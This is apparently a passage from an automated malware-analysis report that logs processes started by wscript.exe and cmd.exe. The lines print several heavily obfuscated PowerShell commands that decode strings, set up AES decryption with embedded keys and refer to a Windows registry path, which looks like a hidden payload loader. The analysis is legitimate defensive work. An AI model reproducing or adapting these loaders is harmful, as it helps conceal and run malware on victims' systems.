iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -DJump to behavior
